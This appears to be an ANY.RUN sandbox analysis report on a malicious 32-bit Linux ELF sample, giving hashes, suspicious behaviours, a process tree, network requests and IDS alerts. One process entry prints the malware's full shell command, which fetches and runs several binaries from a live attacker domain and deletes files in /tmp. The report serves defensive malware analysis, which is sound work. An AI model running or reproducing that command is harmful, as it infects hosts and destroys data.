File name:

a3a1adfcbc6207f3e6e0c35d3cf03904

Full analysis: https://app.any.run/tasks/afce41f6-c4b2-4698-a45a-382720793fae
Verdict: Malicious activity
Analysis date: October 18, 2024, 17:11:52
OS: Ubuntu 22.04.2
Indicators:
MIME: application/x-executable
File info: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, no section header
MD5:

A3A1ADFCBC6207F3E6E0C35D3CF03904

SHA1:

F10F7793D4D78120395D11D7020AB626995E2C01

SHA256:

2636F4D5FA29C3747036D385C3EEE167ABA1AAD58C29597D21DF7E42C6149A35

SSDEEP:

48:fVqwPZ68CoSgHeg/D1K139GUTdpTXT8fc0:fYwPZ68CEQ1tbTm

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Checks DMI information (probably VM detection)

      • sshd (PID: 13964)
      • udevadm (PID: 14007)

    • Reads /proc/mounts (likely used to find writable filesystems)

      • sshd (PID: 13964)

    • Modifies file or directory owner

      • sudo (PID: 13909)

    • Executes commands using command-line interpreter

      • sh (PID: 13923)
      • sudo (PID: 13914)
      • loadbit (PID: 14003)
      • sh (PID: 13915)
      • flock (PID: 13962)
      • cron (PID: 14055)
      • cron (PID: 14052)

    • Modifies Cron jobs

      • sh (PID: 13923)
      • sh (PID: 13955)
      • sh (PID: 13945)

    • Creates shell script file

      • wget (PID: 13952)
      • wget (PID: 13924)
      • wget (PID: 13977)
      • wget (PID: 13965)
      • wget (PID: 13942)

    • Uses wget to download content

      • sh (PID: 13915)
      • sh (PID: 13923)
      • sh (PID: 14002)

    • Potential Corporate Privacy Violation

      • wget (PID: 13933)
      • wget (PID: 13917)
      • wget (PID: 13985)
      • wget (PID: 13996)
      • wget (PID: 13999)

    • Executes the "rm" command to delete files or directories

      • sh (PID: 13923)
      • sh (PID: 13915)
      • sh (PID: 14004)
      • sh (PID: 14002)

    • Process requests binary or script from the Internet

      • wget (PID: 13936)

    • Intercepts program crashes

      • apport (PID: 13989)

    • Checks the user who created the process

      • cron (PID: 14052)
      • cron (PID: 14055)

    • Manipulating modules (likely to execute programs on system boot)

      • modprobe (PID: 14006)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.o | ELF Executable and Linkable format (generic) (100)

EXIF

EXE

CPUArchitecture: 32 bit
CPUByteOrder: Little endian
ObjectFileType: Executable file
CPUType: i386
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
346
Monitored processes
129
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start sh no specs sudo no specs chown no specs chmod no specs sudo no specs sh no specs locale-check no specs wget systemctl no specs systemctl no specs systemctl no specs chmod no specs chmod no specs sh no specs wget systemctl no specs systemctl no specs systemctl no specs chmod no specs chmod no specs sh no specs rm no specs dash no specs wget chmod no specs chmod no specs wget crontab no specs grep no specs dash no specs crontab no specs wget crontab no specs chmod no specs chmod no specs sh no specs crontab no specs grep no specs dash no specs crontab no specs crontab no specs rm no specs wget chmod no specs chmod no specs sh no specs crontab no specs grep no specs dash no specs crontab no specs crontab no specs rm no specs flock no specs sh no specs wget sshd no specs sshd chmod no specs chmod no specs sh no specs grep no specs rm no specs wget chmod no specs chmod no specs sh no specs grep no specs rm no specs flock no specs rm no specs wget chmod no specs chmod no specs lushput no specs apport rm no specs rm no specs wget chmod no specs chmod no specs wget chmod no specs chmod no specs sh no specs loadbit no specs sh no specs rm no specs modprobe no specs udevadm no specs wget chmod no specs chmod no specs dash no specs rm no specs wget no specs chmod no specs chmod no specs wget no specs crontab no specs grep no specs wget chmod no specs chmod no specs dash no specs rm no specs wget chmod no specs chmod no specs dash no specs rm no specs flock no specs wget chmod no specs chmod no specs dash no specs rm no specs wget chmod no specs chmod no specs dash no specs rm no specs flock no specs rm no specs cron no specs sh no specs flock no specs cron no specs sh no specs flock no specs

Process information

PID
CMD
Path
Indicators
Parent process
13908/bin/sh -c "sudo chown user /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904\.o && chmod +x /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904\.o && DISPLAY=:0 sudo -iu user /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904\.o "/bin/shany-guest-agent
User:
root
Integrity Level:
UNKNOWN
Exit code:
1195
13909sudo chown user /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904.o/usr/bin/sudosh
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
13912chown user /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904.o/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
13913chmod +x /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904.o/usr/bin/chmodsh
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
13914sudo -iu user /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904.o/usr/bin/sudosh
User:
root
Integrity Level:
UNKNOWN
Exit code:
1195
13915/bin/sh -c "wget -nc http://main\.dsn\.ovh/dns/lovely -q -P /var/tmp/; chmod 777 /var/tmp/lovely; curl http://main\.dsn\.ovh/dns/lovely -s -o /var/tmp/lovely; chmod 777 /var/tmp/lovely; cd /var/tmp; \./lovely; cd /var/tmp; rm lovely; wget -nc http://main\.dsn\.ovh/dns/lushput -q -P /tmp/; chmod 777 /tmp/lushput; curl http://main\.dsn\.ovh/dns/lushput -s -o /tmp/lushput; chmod 777 /tmp/lushput; cd /tmp; \./lushput 'wget -nc http://main\.dsn\.ovh/dns/bitnow -q -P /var/tmp/; chmod 777 /var/tmp/bitnow; curl http://main\.dsn\.ovh/dns/bitnow -s -o /var/tmp/bitnow; chmod 777 /var/tmp/bitnow; cd /var/tmp; \./bitnow; cd /var/tmp; rm bitnow' 2>/dev/null; cd /tmp; rm -rf *; cd /tmp; rm -rf \.pkexec; wget -nc http://main\.dsn\.ovh/dns/seasbit -q -P /tmp/; chmod 777 /tmp/seasbit; curl http://main\.dsn\.ovh/dns/seasbit -s -o /tmp/seasbit; chmod 777 /tmp/seasbit; wget -nc http://main\.dsn\.ovh/dns/loadbit -q -P /tmp/; chmod 777 /tmp/loadbit; curl http://main\.dsn\.ovh/dns/loadbit -s -o /tmp/loadbit; chmod 777 /tmp/loadbit; cd /tmp; \./loadbit 2>/dev/null; cd /tmp; rm -rf *"/bin/shsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
13920
13916/usr/bin/locale-check C.UTF-8/usr/bin/locale-checksh
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
13917wget -nc http://main.dsn.ovh/dns/lovely -q -P /var/tmp//usr/bin/wget
sh
User:
user
Integrity Level:
UNKNOWN
Exit code:
482
13918systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service/usr/bin/systemctlsnapd
User:
root
Integrity Level:
UNKNOWN
Exit code:
482
13919systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service/usr/bin/systemctlsnapd
User:
root
Integrity Level:
UNKNOWN
Exit code:
482
Executable files
0
Suspicious files
3
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
13917wget/var/tmp/lovelyo
MD5:
SHA256:
13933wget/var/tmp/sshdbinary
MD5:
SHA256:
13999wget/tmp/loadbitbinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
28
DNS requests
57
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
91.189.91.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
13933
wget
GET
188.114.96.3:80
http://main.dsn.ovh/dns/sshd
unknown
whitelisted
13924
wget
GET
200
188.114.97.3:80
http://main.dsn.ovh/dns/unix.sh
unknown
malicious
13942
wget
GET
200
188.114.97.3:80
http://main.dsn.ovh/dns/truct.sh
unknown
malicious
13952
wget
GET
200
188.114.97.3:80
http://main.dsn.ovh/dns/brict.sh
unknown
malicious
GET
200
188.114.96.3:80
http://main.dsn.ovh/dns/retrict.sh
unknown
malicious
13936
wget
GET
200
188.114.96.3:80
http://main.dsn.ovh/dns/config.json
unknown
malicious
13917
wget
GET
200
188.114.96.3:80
http://main.dsn.ovh/dns/lovely
unknown
malicious
13996
wget
GET
200
188.114.96.3:80
http://main.dsn.ovh/dns/seasbit
unknown
malicious
13977
wget
GET
200
188.114.97.3:80
http://main.dsn.ovh/dns/politrict.sh
unknown
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
470
avahi-daemon
224.0.0.251:5353
unknown
185.125.190.48:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
91.189.91.98:80
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted
169.150.255.180:443
odrs.gnome.org
GB
whitelisted
485
snapd
185.125.188.55:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
485
snapd
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
13917
wget
188.114.96.3:80
main.dsn.ovh
CLOUDFLARENET
NL
malicious
13924
wget
188.114.97.3:80
main.dsn.ovh
CLOUDFLARENET
NL
malicious
485
snapd
185.125.188.58:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
485
snapd
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 185.125.190.48
  • 91.189.91.98
  • 185.125.190.49
  • 91.189.91.48
  • 185.125.190.18
  • 185.125.190.98
  • 185.125.190.97
  • 91.189.91.96
  • 91.189.91.49
  • 185.125.190.17
  • 185.125.190.96
  • 91.189.91.97
  • 2620:2d:4000:1::22
  • 2620:2d:4002:1::197
  • 2620:2d:4000:1::2b
  • 2001:67c:1562::24
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::97
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::23
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::96
  • 2001:67c:1562::23
whitelisted
google.com
  • 142.250.184.238
  • 2a00:1450:4001:827::200e
whitelisted
odrs.gnome.org
  • 169.150.255.180
  • 195.181.175.40
  • 169.150.255.184
  • 195.181.170.19
  • 37.19.194.80
  • 207.211.211.27
  • 212.102.56.179
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::18
whitelisted
api.snapcraft.io
  • 185.125.188.55
  • 185.125.188.54
  • 185.125.188.58
  • 185.125.188.59
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::6d
  • 2620:2d:4000:1010::2e6
whitelisted
main.dsn.ovh
  • 188.114.96.3
  • 188.114.97.3
  • 2a06:98c1:3121::3
  • 2a06:98c1:3120::3
malicious
61.100.168.192.in-addr.arpa
unknown
dash.dsn.ovh
  • 185.85.240.7
unknown
dash.cloudflare.ovh
unknown

Threats

PID
Process
Class
Message
13917
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
13933
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
13985
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
13996
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
13999
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
a3a1adfcbc6207f3e6e0c35d3cf03904